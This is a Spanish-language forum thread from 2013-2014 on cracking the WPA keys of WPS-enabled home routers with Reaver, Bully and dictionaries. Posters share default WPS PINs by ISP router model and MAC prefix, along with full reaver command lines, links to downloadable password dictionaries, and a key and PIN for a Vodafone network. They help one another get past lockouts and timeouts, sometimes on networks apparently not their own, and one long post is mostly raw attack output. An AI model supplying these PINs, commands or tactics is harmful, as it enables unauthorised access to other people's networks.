ojo que las redes de Orange por lo menos con sus routers Huawei vienen con el WPS desactivado por defecto, yo tengo 2 routers de esos en casa y estan = por defecto el WPS esta activado solo para pulsar el boton ese si el dispositivo lo tiene osea sin pin.

Y mire otros routers tipo WLAN_XXXX no recuerdo los nombres pero estaban igual, por defecto el wps on pero sin pin, por eso queda en el reaver 99% y nunca saca el pin


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: buite en 10 Septiembre 2013, 16:32 pm
gracias Elsevi.

Lo probaré cuando pueda.

Un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 12 Septiembre 2013, 02:21 am
(http://i.minus.com/i2jbCJiQE71tS.png)

Terry Dunlap día a día nos va informando el proceso de fabricación de los nuevos Reaver Pro™ v2.0!

Cita de: Terry Dunlap
Aquí está la muestra del unboxing del nuevo Reaver Pro™ v2.0. Los pedidos finales de esta semana, 06 de septiembre! Después de eso, es el precio completo. Ordene ahora en www.reaverpro.com

tqvzbBKXi_Q

Q6RkNIwZZ1A


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 12 Septiembre 2013, 18:13 pm
Están poniendo redes nuevas los de telefonica por mi zona. Tengo varias, el ssid es MOVISTAR_92xx (en las dos que veo lo de movistar es igual y las x son numeros en las dos) la mac es F8:85:C9:xx:92:xx (coinciden los tres numeros del ssid con la posicion 9,10 y 11 de la mac, respectivamente, variando la ultima cifra) es una wpa-psk (trip+aes) y tiene el wps activado. Voy ha hacer unas pruebas y os comento.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 13 Septiembre 2013, 00:00 am
Si se estan poniendo son vulnerables en segundos tienen asigando por defecto el primer pin que prueba reaver 12345670  ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 13 Septiembre 2013, 00:07 am
Pongo una imagen para que veais el nuevo router de movistar al parecer es un Home Station ADSL ZTE H108N

(http://mpe-s2-p.mlstatic.com/router-wifi-3g-adsl-zte-usb-h108n-access-movistar-telefonic-3862-MPE4865011893_082013-O.jpg)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 13 Septiembre 2013, 01:32 am
@GOolden: yo tengo el mismo router pero con MAC: C8:64:C7:XX:XX:XX y no tiene ese pin va todavía no lo he sacado pues se bloquea cada 10 intentos durante 2 o 4 días.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 13 Septiembre 2013, 17:40 pm
Ayer no pude atacarlo con el reaver, pero he visto el comentario de GOolden y decia que el pin era el 1234567. He probado ese pin con un programa de ralink y se ha conectado. Aqui os dejo una captura de algunos datos. Si tengo que cambiar algo o borrar u ocultar algun dato, decidmelo.
http://www.subirimagenes.com/privadas-sinttulo-2120641.html
(http://www.subirimagenes.com/privadas-sinttulo-2120641.html)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 13 Septiembre 2013, 17:41 pm
Y teneis razon, es un router de movistar zte, conectado via adsl.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 13 Septiembre 2013, 23:47 pm
@GOolden: yo tengo el mismo router pero con MAC: C8:64:C7:XX:XX:XX y no tiene ese pin va todavía no lo he sacado pues se bloquea cada 10 intentos durante 2 o 4 días.
P4nd3m0n1um quizas sea otro de zte diferente a este y tenga otro pin asignado pero habria que descartarlo de todas maneras quizas movistar este poniendo otro modelo pero yo por ahora vi este y la clave es de 20 digitos con mayusculas y minusculas de la A a la Z y numeros del 0 al 9 ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 13 Septiembre 2013, 23:56 pm
En mi zona tambien hay un modelo de movistar que pusieron hace unos dias mac 50:67:f0 el routers es este Zyxel P-870HW-51A V2 al parecer se esta poniendo tambien wps desactivado por defecto pongo imagenes
(http://salestores.com/stores/images/images_747/P870HW51AV2.jpg)
 
Clave de 20 digitos de la A a F numero del 0 a 9


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 14 Septiembre 2013, 01:11 am
Mirar lo que encontre http://2.bp.blogspot.com/-mrvzeylOXBg/TwGCWcAXOyI/AAAAAAAABrY/wx-xFJPHqco/s1600/configuracion_wireless_livebox2.png


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 14 Septiembre 2013, 01:21 am
Las livebox 2.0 tienen asignado el primer que prueba que reaver lo raro es que reaver lo pasa como si nada debe de tener algun boton que dure un 1 minuto para el ataque wps.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 14 Septiembre 2013, 09:53 am
P4nd3m0n1um quizas sea otro de zte diferente a este y tenga otro pin asignado pero habria que descartarlo de todas maneras quizas movistar este poniendo otro modelo pero yo por ahora vi este y la clave es de 20 digitos con mayusculas y minusculas de la A a la Z y numeros del 0 al 9 ;D

Los datos que tengo:

WPS-Version: 1.0
Model Name: H108L
Model: 12345678
Serial: 12345678
Device name: H108L (Pequeña diferencia H108N)
Manufacture: ZTE
Authentication: WPA-PSK TKIP
MAC: C8:64:C7:XX:XX:XX


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jesman1978 en 9 Octubre 2013, 00:24 am
Hola me gustaría saber mas de esta red ya que yo tengo una y no se que hacer , seria de muchísima utilidad que me comunicaras todo lo que sabes de esta red ...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 14 Octubre 2013, 22:21 pm
@catalonya: tenes que variar las versiones de reaver.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 18 Octubre 2013, 14:41 pm
Nuevas redes de telefonica SSID MOVISTAR_XXXX MAC E4:C1:46:XX:XX:XX coinciden los dos ultimos digitos con el nombre. Se sabe algo de esta red? tiene el wps activado, he probado con 12345670 como pin y no da la clave.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 18 Octubre 2013, 19:24 pm
Prueba con bully estas redes no van con reaver.



Con bully si funcionan


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 18 Octubre 2013, 21:12 pm
Prueba con bully estas redes no van con reaver.



Con bully si funcionan
¿Bully? ¿Donde puedo descargarlo?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 9 Noviembre 2013, 21:06 pm
(http://www.tp-link.com/resources/images/products/Large/TL-WR720N_1.0-P1.jpg)

================================
FULL DISCLOSURE - Arg-Wireless.com.ar
Fecha descubrimiento: 09/11/2013
Descubridor: Arg-Wireless.com.ar
================================

(http://www.tp-link.com/resources/images/products/Large/TL-WR720N(UN_02.jpg)

Los nuevos routers de TP-Link TL-WR720N tanto de contraseña WPA2 como de WPS una serie de 8 dígitos numericos.

(http://i.minus.com/if1ekzNpKButO.jpg)
(http://i.minus.com/i5klJBP0v6Ft7.png)

NOTA: Las imágenes anteriores son ejemplificadas y se han quitado los datos originales por unos genéricos.

Más Información:

FCC ID: TE7WR720N (https://fcc.io/TE7/WR720N)
FCC approval date: 29 May 2012

CPU1: Atheros AR9331
FLA1: 2 MB (cFeon QH16-104HIP)
RAM1: 16 MB (Winbond W9412G6JH-5)
Power: 9 VDC, 0.6 A
WI1 chip1: Atheros AR9331
WI1 802.11 protocols: bgn
WI1 MIMO config: 1x1:1
WI1 antenna connector: none
ETH chip1: Atheros AR9331
Switch: Atheros AR9331
LAN speed: 10/100
LAN ports: 2
WAN ports: 1

MAC Address: 64-66-B3-9F-ED-48
SSID: TP-LINK_9FED48
MULTI-SSID: TP-LINK_9FED48_2 -> TP-LINK_9FED48_4
WPS: 34519523
WPA2-PSK: 34519523
S/N: 136A6404260
P/N: 1750502094
UPC Code: 8 45973 05198 3
EAN-13 Code: 6 935364 051983
Model: TL-WR720N(ES) Ver: 1.0

Imagenes:
(http://i.minus.com/iRbVt02LGeHe.png)
(http://i.minus.com/iNcWfJeion7uM.png)

Software de Instalación:
wr720n-EasySetupAssistant.rar 6.0 MB
https://mega.co.nz/#!KUJnBbJQ!bvebQXf7Fd5d6GdpjIYVxkP6CaQD4BpWNAL9YYw7kMU (https://mega.co.nz/#!KUJnBbJQ!bvebQXf7Fd5d6GdpjIYVxkP6CaQD4BpWNAL9YYw7kMU)

Direccionarios no llegan a 4 o 9MB:

tplink-tlwr720n.dic.rar 2.1 MB
https://mega.co.nz/#!XdwHUSKQ!bC8Agwd7y471-lXEmJjjNguv3JxxOd6woVITWtUI4iI (https://mega.co.nz/#!XdwHUSKQ!bC8Agwd7y471-lXEmJjjNguv3JxxOd6woVITWtUI4iI)

tplink-tlwr720n2.rar 4.1 MB
https://mega.co.nz/#!SI50TTJI!Nf4W8ThGjng7wCx2R9KJqgqVZLMgH8C4CWszxT7BkAI (https://mega.co.nz/#!SI50TTJI!Nf4W8ThGjng7wCx2R9KJqgqVZLMgH8C4CWszxT7BkAI)

Sacando los tipicos 00000000, 11111111, 88888888, etc.


Título: Re: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sanson en 9 Noviembre 2013, 22:52 pm
Hola

Pandemoniun perdoname ¿pero full disclousure por esto?  

Lo veo desde tapatalk y hay veces que no sale todo lo del post ,  pero al final simplemente es que usa un pin por defecto ¿no?

Saludos y gracias por compartir

Edito

Ahhh ok veo que la contraseña es la que es , por defecto


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magicmuglio en 10 Noviembre 2013, 14:33 pm
buenas tardes, os comento algunas dudas haber si me podéis ayudar.
El otro día estuve probando el último wifi slax en casa de mi primo con esta mac:8c:0c:a3:2d:5a:17 y tiene lo del wps pero como soy muy novato nose si activado o no en el programa me salia como no soportado, el caso es que haciendo el reaver se ponía bien a sacar la contraseña pero tardaba muchísimo y lo dejé en el 0,07%.
Mi pregunta es, ¿lo estoy haciendo bien? Un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 11 Noviembre 2013, 09:16 am
magicmuglio: Para asegurarte si tiene el WPS activado o no miralo con el wash te dira si esta bloqueado o no si no tienes el WPS activado si le puedes atacar a esa red, dejalo correr mas tiempo unas 10 o 15 horas si pasado esas horas no te saca la clave es que no se puede se supone a no ser que le metas el pin correcto.Saludos ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jrrr1986 en 19 Noviembre 2013, 00:16 am
Hola!! Estoy realizando una auditoria de red en una Orange-XXXX utilizando Wifislax 4.7.

Utilizando primero el Wash he comprobado que SÍ tiene WPS activado. Posteriormente he procedido a usar el reaver (tanto con el comando "reaver" como con "reavermod") pero se queda en 0,00% y no avanza. Me dice todo el rato WARNING: Receive timeout occurred.

He visto que alguien ha utilizado el script de 1camaron1 para descifrar una red Orange similar a este...podríais explicarme de dónde me lo bajo y cómo hacerlo por favor??? Muchísimas gracias!!!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: gladiusvts en 27 Noviembre 2013, 18:04 pm
Prueba con bully estas redes no van con reaver.



Con bully si funcionan

¿Qué es el BULLY y para qué sirve en concreto?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: luizito91 en 12 Diciembre 2013, 21:29 pm
Muy buenas!!, o yo soy muy torpe o esto no me funciona ni de coña... Tengo un TECOM de WLAN_XXXX, WPS activado, MAC 00:19:15:XX:XX:XX, y lo unico que consigo son errores, estoy utilizando WifiSlax 4.7.2, todas las herramientas habidas y por haber que trae para WPS, y varias antenas, RTL8187L, RT2870, TP-LINK WN722N (Trae atheros), la propia del portatil (Intel 1000REV) y me vuelvo loco... no consigo vulnerar el WPS, solo recibo error del tipo:

Enviando Solucitus WPS[EAPOL START]
ERROR: Tiempo de espera agotado.
Enviando Solucitus WPS[EAPOL START]
ERROR: Tiempo de espera agotado.
Enviando Solucitus WPS[EAPOL START]
ERROR: Tiempo de espera agotado.

Cabe a destacar que al principio dice "Asociando con 00:19:15:xx:xx:xx" y prueba el pin por defecto por lo tanto creo que se supone que si se asocia, pero no consigue ni siquiera probar el propio pin que trae de fabrica. llevo meses intentando y ya he llegado a la desesperacion.. He visto que por aqui le ha ocurrido a mas gente, pero desconozco si lo llegaron a solucionar o no, si es asi y alguien conoce el porqué de ese error porfavor... AYUDENME!!!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 13 Diciembre 2013, 16:19 pm
Muy buenas!!, o yo soy muy torpe o esto no me funciona ni de coña... Tengo un TECOM de WLAN_XXXX, WPS activado, MAC 00:19:15:XX:XX:XX, y lo unico que consigo son errores, estoy utilizando WifiSlax 4.7.2, todas las herramientas habidas y por haber que trae para WPS, y varias antenas, RTL8187L, RT2870, TP-LINK WN722N (Trae atheros), la propia del portatil (Intel 1000REV) y me vuelvo loco... no consigo vulnerar el WPS, solo recibo error del tipo:

Enviando Solucitus WPS[EAPOL START]
ERROR: Tiempo de espera agotado.
Enviando Solucitus WPS[EAPOL START]
ERROR: Tiempo de espera agotado.
Enviando Solucitus WPS[EAPOL START]
ERROR: Tiempo de espera agotado.

Cabe a destacar que al principio dice "Asociando con 00:19:15:xx:xx:xx" y prueba el pin por defecto por lo tanto creo que se supone que si se asocia, pero no consigue ni siquiera probar el propio pin que trae de fabrica. llevo meses intentando y ya he llegado a la desesperacion.. He visto que por aqui le ha ocurrido a mas gente, pero desconozco si lo llegaron a solucionar o no, si es asi y alguien conoce el porqué de ese error porfavor... AYUDENME!!!
Ese router no se puede sacar la red mediante wps, aunque la tenga activada. El wps de ese router solo sirve para darle al boton y se asocien los dispositivos sin necesidad de poner la clave.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 13 Diciembre 2013, 18:25 pm
Citar
Cabe a destacar que al principio dice "Asociando con 00:19:15:xx:xx:xx" y prueba el pin por defecto por lo tanto creo que se supone que si se asocia, pero no consigue ni siquiera probar el propio pin que trae de fabrica. llevo meses intentando y ya he llegado a la desesperacion.. He visto que por aqui le ha ocurrido a mas gente, pero desconozco si lo llegaron a solucionar o no, si es asi y alguien conoce el porqué de ese error porfavor... AYUDENME!!!

Haber como te dice el compañero adrihamel el router se bloquea por que tiene el WPS activado, entonces va ser imposible sacarlo aunque te sepas el pin desactiva el WPS de tu router y lo vuelves a intentar veras como te da la clave, otra solución que tendrías sería capturar el hanske y sacarlo a través  de un diccionario por fuerza bruta es mas difícil pero lo puedes intentar.Saludos :silbar:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Octubre Rojo en 14 Diciembre 2013, 01:47 am
Haber como te dice el compañero adrihamel el router se bloquea por que tiene el WPS activado, entonces va ser imposible sacarlo aunque te sepas el pin desactiva el WPS de tu router y lo vuelves a intentar veras como te da la clave, otra solución que tendrías sería capturar el hanske y sacarlo a través  de un diccionario por fuerza bruta es mas difícil pero lo puedes intentar.Saludos :silbar:

Me sucede lo mismo,tanto wps como sin el, no envía los pins o si envía siempre es el mismo, no avanza

He pensado que puede ser debido a que el router necesite un reseteo pero no se como forzar ese reseteo, que se os ocurre?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 14 Diciembre 2013, 10:01 am
Yo he sacado una red 00:19:15 por diccionario y me tardo unos 20 minutos si mal no recuerdo, pero lo que dice luizito91, ami me suena a que no es su router. Además, si fuese tu router, ¿para qué quieres hacer eso? Si no quieres que te saquen la red, clambia la clave, el cifrado ponlo en wpa2-psk aes, cambia el nombre de la red, desactiva el wps y ocultala.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 14 Diciembre 2013, 10:03 am
Me sucede lo mismo,tanto wps como sin el, no envía los pins o si envía siempre es el mismo, no avanza

He pensado que puede ser debido a que el router necesite un reseteo pero no se como forzar ese reseteo, que se os ocurre?
Ese router por reaver no funciona. Lo mejor es descifrarlo por fuerza bruta mediante un diccionario. En internet hay un Script para eso.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Octubre Rojo en 14 Diciembre 2013, 17:58 pm
Que programas recomendarias para realizar el ataque por fuerza bruta a esa red?. :huh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 14 Diciembre 2013, 21:07 pm
Citar
Que programas recomendarias para realizar el ataque por fuerza bruta a esa red?

Reaver y diccionario no hay mas


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: luizito91 en 15 Diciembre 2013, 12:02 pm
adrihamel, antes que nada queria aclarar que claro que es mi router, y se los metodos para que no se puedan acceder a el, solo que me gusta saber que cosquillas tiene mi router, actualmente tengo Jazztel con un Comtrend-VR3025un y se que si es vulnerable por no tanto lo e desactivado, queria probar con el router de mi anterior teleoperadora y no me funciona, solo es curiosidad y amor hacia el wireless. Hay aqui mas gente que realmente petan otras redes y nadie dice nada, yo en mi caso lo hago todo con mis routers. De todas formas queria agradeceros la informacion prestada.  ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Octubre Rojo en 17 Diciembre 2013, 23:28 pm
Reaver y diccionario no hay mas

Algún diccionario recomendado? Tengo uno de 11 megas pero no he conseguido nada :huh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Octubre Rojo en 18 Diciembre 2013, 01:52 am
Tenéis alguna idea de que puede estar pasando con la conexión que intento auditar? Aunque tiene el wps activo y sin bloqueo de intentos, el reaver intenta asociarse sin que el router haga nada y al rato, reaver lanza mensajes de error en la asociación :(

Un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: vanagandr en 3 Enero 2014, 15:14 pm
hola
amigo estoy tratando de hacer un listado parametros de pin segun router epero en un archivo.
escribo esto con una consulta ¿el cambio de pin segun vida util de un router varia mucho?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 4 Enero 2014, 14:14 pm
Citar
Algún diccionario recomendado? Tengo uno de 11 megas pero no he conseguido nada

Depende para que red quieras sacar la clave por que hay script que te hacen diccionario y busca la clave o tienes que hacer tu un diccionario con todas las posibles claves cosa mas difícil dime que red es.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: diego121 en 10 Enero 2014, 20:02 pm
BUENAS TARDES AMIGOS, ESTE ES MI PRIMER BLOG EN ESTE FORO, Y LA RAZON ES QUE ESTOY INTENTANDO DESBLOQUEAR MI ROUTER PARA PROBAR EL REAVER Y APRENDER COMO FUNCIONA, YO CONOZCO EL PIN DE MI ROUTER, Y LO INTRODUZCO DIRECTAMENTE EN EL REAVER PARA QUE INTENTE EL HACKEO CON ESE PIN Y ME SAQUE LA CLAVE WPA, PERO NO ME ARROJA LA CORRECTA, ME ARROJA VARIAS CLAVES, Y CADA VES QUE INTENTO CON EL MISMO PIN, ME GENERA UNA CLAVE DIFERENTE A LA ANTERIOR, AQUI LES DEJO LA INFORMACION QUE ME ARROJA EL REAVER



 CH  3 ][ Elapsed: 0 s ][ 2014-01-08 13:02                                     
                                                                               
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                               
 90:F6:52:7A:63:E4  -79        3        0    0   1  54e. WPA2 CCMP   PSK  cyber
                                                                               
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                 


root@bt:~/reaver-1.4/src# reaver -i mon0 -b 90:F6:52:7A:63:E4 -p 81431472 -c 1 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Switching mon0 to channel 1
Waiting for beacon from 90:F6:52:7A:63:E4
Associated with 90:F6:52:7A:63:E4 (ESSID: cybercafee)
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M1 message
Sending WSC NACK
Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
Trying pin 81431472
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M3 message
Sending M4 message
Received M5 message
Sending M6 message
Received M7 message
Sending WSC NACK
Sending WSC NACK
Pin cracked in 14 seconds
WPS PIN: '81431472'
WPA PSK: 'C6832BB21266060C1EA553998151D7DEA240C3C2DF499423A434AA268D38C57F'
AP SSID: 'Network-90f6527a63e4'
Nothing done, nothing to save.

root@bt:~/reaver-1.4/src# reaver -i mon0 -b 90:F6:52:7A:63:E4 -p 81431472 -c 1 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Switching mon0 to channel 1
Waiting for beacon from 90:F6:52:7A:63:E4
Associated with 90:F6:52:7A:63:E4 (ESSID: cybercafee)
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M1 message
Sending WSC NACK
Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M3 message
Sending M4 message
Received M3 message
Sending WSC NACK
Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M3 message
Sending M4 message
Received M5 message
Sending M6 message
Received M7 message
Sending WSC NACK
Sending WSC NACK
Pin cracked in 9 seconds
WPS PIN: '81431472'
WPA PSK: '2FDB811A0766E1F15BEC35C3260388F0F92FCA60C366BB4FFA99175E381C1D37'
AP SSID: 'Network-90f6527a63e4'
Nothing done, nothing to save.

root@bt:~/reaver-1.4/src# reaver -i mon0 -b 90:F6:52:7A:63:E4 -p 81431472 -c 1 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Switching mon0 to channel 1
Waiting for beacon from 90:F6:52:7A:63:E4
Associated with 90:F6:52:7A:63:E4 (ESSID: cybercafee)
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M1 message
Sending WSC NACK
Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M3 message
Sending M4 message
Received M5 message
Sending M6 message
Received M7 message
Sending WSC NACK
Sending WSC NACK
Pin cracked in 5 seconds
WPS PIN: '81431472'
WPA PSK: '8356E5E5A03787955655BB8917A28CC9CFA981D489B56ECAC495A887291192FC'
AP SSID: 'Network-90f6527a63e4'
Nothing done, nothing to save.

root@bt:~/reaver-1.4/src# reaver -i mon0 -b 90:F6:52:7A:63:E4 -p 81431472 -c 1 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Switching mon0 to channel 1
Waiting for beacon from 90:F6:52:7A:63:E4
Associated with 90:F6:52:7A:63:E4 (ESSID: cybercafee)
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M3 message
Sending M4 message
Received M5 message
Sending M6 message
Received M7 message
Sending WSC NACK
Sending WSC NACK
Pin cracked in 3 seconds
WPS PIN: '81431472'
WPA PSK: '7C032AE7BF305B26D0ED34D15C91A2E66E164642297FB45D2757C661F0BF08EA'
AP SSID: 'Network-90f6527a63e4'
Nothing done, nothing to save.

root@bt:~/reaver-1.4/src# reaver -i mon0 -b 90:F6:52:7A:63:E4 -p 81431472 -c 1 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Switching mon0 to channel 1
Waiting for beacon from 90:F6:52:7A:63:E4
Associated with 90:F6:52:7A:63:E4 (ESSID: cybercafee)
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M1 message
Sending WSC NACK
Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M3 message
Sending M4 message
Received M5 message
Sending M6 message
Received M7 message
Sending WSC NACK
Sending WSC NACK
Pin cracked in 5 seconds
WPS PIN: '81431472'
WPA PSK: 'CEB036FA15449D1A1CADF7A4EF0EDF6C4014F941220991C6B77ACCACFB4FB501'
AP SSID: 'Network-90f6527a63e4'
Nothing done, nothing to save.

root@bt:~/reaver-1.4/src# reaver -i mon0 -b 90:F6:52:7A:63:E4 -p 81431472 -c 1 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Switching mon0 to channel 1
Waiting for beacon from 90:F6:52:7A:63:E4
Associated with 90:F6:52:7A:63:E4 (ESSID: cybercafee)
Trying pin 81431472
Sending EAPOL START request
Received identity request
Sending identity response
Received M1 message
Sending M2 message
Received M3 message
Sending M4 message
Received M5 message
Sending M6 message
Received M7 message
Sending WSC NACK
Sending WSC NACK
Pin cracked in 3 seconds
WPS PIN: '81431472'
WPA PSK: 'D5DE748B839DE8E2DA70FDF84369BDA55851C11A5A703F3A72E14E5603002CCA'
AP SSID: 'Network-90f6527a63e4'
Nothing done, nothing to save.


DE FORMA TAL QUE EL REAVER NO ME HA ARROJADO LA CLAVE REAL DEL ROUTER, Y DONDE DICE AP SSID NO ME ARROJA EL NOMBRE DE MI RED REAL, ME SALE OTRA QUE NO ES Y DE PASO TAMBIEN CAMBIA A MEDIDA QUE INTENTO HACKEAR CON EL MISMO PIN

MI ROUTER ES UN TP-LINK TL-WR941N

SIENDO TODO POR AHORA ME GUSTARIA QUE ME AYUDARAN A SOLUCIONAR O SABER A QUE SE DEBE ESTA GENERACION DE CLAVE INCORRECTA, GRACIAS.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: efars20 en 10 Febrero 2014, 21:29 pm
Hola a todos!
Soy nuevo en todo esto y mirando por foros he visto que aqui hay nivel.
El otro dia descargue wifislax 4.7 y me puse a hacer pruebas con el reaver. De vez en cuando me dice 10 failed connections in a row y tambien 25 successive start failures pero continua comprobando pins y el porcentage sigue aumentando. Que significan esos avisos? Podre vulnerar mi router?
Gracias de antemano chicos!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 11 Febrero 2014, 09:59 am
Buenas:

@efars: Hasta que no termine la comprobación (o bien se quede "pillado") tu router puede ser vulnerable

Saludos

ChimoC


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: efars20 en 11 Febrero 2014, 18:43 pm
Gracias ChimoC!  ;-) y a parte del reaver hay otros metodos con los que averiguar la contraseña? Es por que esto es muy lento...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: chemamontevideo en 9 Marzo 2014, 13:00 pm
wenas, alguien tiene informacion sobre este router nuevo de movistar, de los que ponen con la fibra optica?

FABRICANTE: Comtrend
SSID: MOVISTAR_XXXX
MAC: F8:8E:85
WPS: activado



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: malomher en 9 Marzo 2014, 18:40 pm
Estos son los pin al 99% de tres router FTE:XXXX de Orange


20:2B:C1:XX:XX:XX        01239980   
CC:96:A0:XX:XX:XX         12349838      
CC:96:A0:XX:XX:XX         12349982


Ninguno soltó la contraseña WPA

¿a ver si a alguien se le ocurre algo?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: CAMARA123 en 9 Marzo 2014, 21:27 pm
Essid: vodafoneXXXX

Bssid: 6A:96:BF:XX:XX:XX

Key: UVXSMTJJNHNSWL

Wps Pin: 73357643


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Juanitooo en 19 Mayo 2014, 20:05 pm
WLAN_XXXX (Movistar)

8C:0C:A3:XX:XX:XX

wps pin: 92947343

Auditado con Reaver-mod


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: NEXUS978 en 21 Mayo 2014, 19:23 pm
wenas, alguien tiene informacion sobre este router nuevo de movistar, de los que ponen con la fibra optica?

FABRICANTE: Comtrend
SSID: MOVISTAR_XXXX
MAC: F8:8E:85
WPS: activado



Buenas:
He leido en varios sitios que el pin para ese router que citas es el  19117652

La linea de comando completa seria esta: reaver -i mon0 -b F8:8E:85:XX:XX:XX -p 19117652 -vv

Ahora..te comento, estamos probando un amigo y yo con su router y se queda al 90'91% y no avanza, no se si se le esta pasando a mas gente con estos routers de fibra optica.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: elmatador25 en 21 Mayo 2014, 20:34 pm

Hola y saludos a todos, yo estoy utilizando la version de reaver 1.4 tarjeta alfa 1w realtek 8187L y cuando llega al 99.99% probando pines se cuelga y se queda ahí , que puede pasar, alguna solución,,,,, gracias a todos,,,,,,por egran foro,,,,,
[/quote]


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 24 Mayo 2014, 22:35 pm
(http://i.minus.com/iZHEngKctVW3v.png)

